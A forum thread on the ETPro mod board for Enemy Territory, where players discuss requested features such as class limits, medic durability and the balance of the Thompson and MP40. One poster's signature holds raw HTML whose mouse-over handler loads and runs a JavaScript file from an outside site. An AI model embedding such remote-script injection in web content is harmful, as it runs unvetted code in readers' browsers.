Feature requests.

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

jessed75

Feature requests.

Post by jessed75 »

I dont post here much but I have been using ETPro since 1.0. I told my guild that I intend to shut down my ET server when the next version of True Combat Elite comes out. Even though ET has been a great game there are some major problems with it and I am sick of it. I would love to stay with ET but the only way these things would be "fixed" would be if they were incorporated into ETPro.

1. You have the ability to limit the soldiers with maxpanzers, mortars, etc. How about limiting the other classes? I would like the ability to only have one medic, covert, and FO on each team. I am so sick of "rambo medics" and other people not playing engineer when we need them.

2. Have the ablilty to make the medic just as easy to kill as the other classes. Same amount of bullets to an area, etc. Many players are medics just because they die less, they have no desire to help the team.

3. Make the thompson and MP40 more balanced. They dont have to be identical, but the thompson is very inaccurate at longer distances while the MP40 is almost perfect to where the crosshair is. The thompson is more powerful than the MP40 at close range. Please balance this a bit more. When I am on Axis I do much better than on Allies.

I swear sometimes I feel the developers of this game are pro-defense. My opinion is if both teams are equal defense has a huge advantage, especially if Axis. Having these options to set would greatly even things out. My whole guild agrees with me, and they dont want me to shut down ET. But after 2 years I'm sick of these problems.

Please help Bani! :oops: :o :shock: :D
uber-noob

Re: Feature requests.

Post by uber-noob »

jessed75 wrote: 1. You have the ability to limit the soldiers with maxpanzers, mortars, etc. How about limiting the other classes?
Would be nice.
jessed75 wrote: 2. Have the ablilty to make the medic just as easy to kill as the other classes. Same amount of bullets to an area, etc. Many players are medics just because they die less, they have no desire to help the team.
I would rather give him a weaker weapon, he needs the higher durability to jump into the battle and revive his team mates.
jessed75 wrote: 3. Make the thompson and MP40 more balanced. They dont have to be identical, but the thompson is very inaccurate at longer distances while the MP40 is almost perfect to where the crosshair is.
Unless ETPro changed it, they are 100% identical.
gotenks

Post by gotenks »

uber_noob wrote:
jessed75 wrote: 3. Make the thompson and MP40 more balanced. They dont have to be identical, but the thompson is very inaccurate at longer distances while the MP40 is almost perfect to where the crosshair is.
Unless ETPro changed it, they are 100% identical.
last mention, no ETPRO did NOT change this... they still have the same spread, same ROF, same damage, same ammo cache... different sound, different skin (except when b_wolfrof is enabled)
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Nail

Post by Nail »

if you can't get the guys in your guild/clan to play the right class, your clan is full of immature dicks, restricting classes won't matter to them, they'll switch servers.

Far too much "I, my, me, mine" going on these days

Forcing people to play "YOUR" game isn't the answer, get a better clan is

or do as my sig suggests
Improvise, Adapt, Overcome
ouroboro

Post by ouroboro »

your old sig was better tbh
ReyalP

Post by ReyalP »

gotenks wrote: last mention, no ETPRO did NOT change this... they still have the same spread, same ROF, same damage, same ammo cache... different sound, different skin (except when b_wolfrof is enabled)
They are the same even when wolfrof is enabled.
send lawyers, guns and money
booger

Post by booger »

etadmin mod does this,with varying degrees of success. Usually server admins have to strike a balance between popularity and playability.Isn't always easy to do.
Seems if you restrict nothing,you MAY have have a popular server,but very few regulars because it's basically everyone for himself.If you remove the rambo element,the idiots will soon leave,dosn't gurantee you'll have many players left though.
On the other hand,more team players are inclined to play where they know they'll get help.
Then there are those servers with idiotic things like 'no more than 3 clan members to a team',that sort of thing.
[MoB]Seany

Post by [MoB]Seany »

What your looking for is a public mod....etpro is a competition mod...limited classes dosn't really have a place in etpro. And if you cant get your clan to play the right classes in a match..then thats another problem. There are mods out there that support what your asking for..just not etpro...and for a good reason.
[MoB]

NetNut: "I never cheat on a FPS game, but i will use my aimbot for Minesweeper or Solitare."
Rain

Post by Rain »

jessed75 wrote:1. You have the ability to limit the soldiers with maxpanzers, mortars, etc. How about limiting the other classes? I would like the ability to only have one medic, covert, and FO on each team. I am so sick of "rambo medics" and other people not playing engineer when we need them.
I've been thinking about implementing this; however, I think I'm the only one on the team with much interest in it, and I've been rather busy with Real Life™ lately, so I have no idea when I'll get around to it.
jessed75 wrote:3. Make the thompson and MP40 more balanced. They dont have to be identical, but the thompson is very inaccurate at longer distances while the MP40 is almost perfect to where the crosshair is. The thompson is more powerful than the MP40 at close range. Please balance this a bit more. When I am on Axis I do much better than on Allies.
As others have said, both on this thread and many times in the past, the MP40 and Thompson are identical in all aspects except the model and the sound in ET (and etpro.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
hiro

Post by hiro »

I'd really like the option to limit other classes. For example excessive coverts can be a problem on the few satchel objective maps like Reactor - not so much in clan matches, but it would be great to limt them to 3 on our public SW servers that all the clanners play on. And our et_headshot server would have far less arguments if we could restrict medics and allow only smg soldiers for this map.
[MoB]Seany

Post by [MoB]Seany »

maybe etpro needs a mini plugin mod for pubplay :?
[MoB]

NetNut: "I never cheat on a FPS game, but i will use my aimbot for Minesweeper or Solitare."
/*Demoman*/

Post by /*Demoman*/ »

[MoB]Seany wrote:maybe etpro needs a mini plugin mod for pubplay :?
or maybe they need to stop being the "mod to end all mods" and just create a competion mod... like etpro was supposed to be

if they want to add nifty pub things like class limitation, shrug, etc move code over to bayonet side and finally begin work on that

how much more needs to be added to etpro to make a pub game balanced for competion? I thought that was the goal... not adding everything that mankind can think of to please every group of whining teenagers
fretn

Post by fretn »

all the comp players play pub also, and we all know that pubs are still played different than clanwars \o/

if this sounds silly, I'm just awake from a 17.00 till 19.30h nap \o/ and I'm feeling dizzy
Day by day : http://w.twwwo.be/
DG

Post by DG »

/*Demoman*/ wrote:to please every group of whining teenagers
Image eptro team set to please every group of whining infants and OAPs
DG

Post by DG »

...anyway, etpro is probably played 1,000x more man-hours on pubs than it is in comp. Regardless, if it doesnt damage competition, #care? Extra options are actually a concern for public servers, not competition where there's a .config forcing known standard settings.

Even still, "competition" covers a wider base than what you perhaps consider it to be. For example, perhaps this competition (or one like it) would like SMG soldier only - being able to force it would automate a very likely big problem & time waster for them.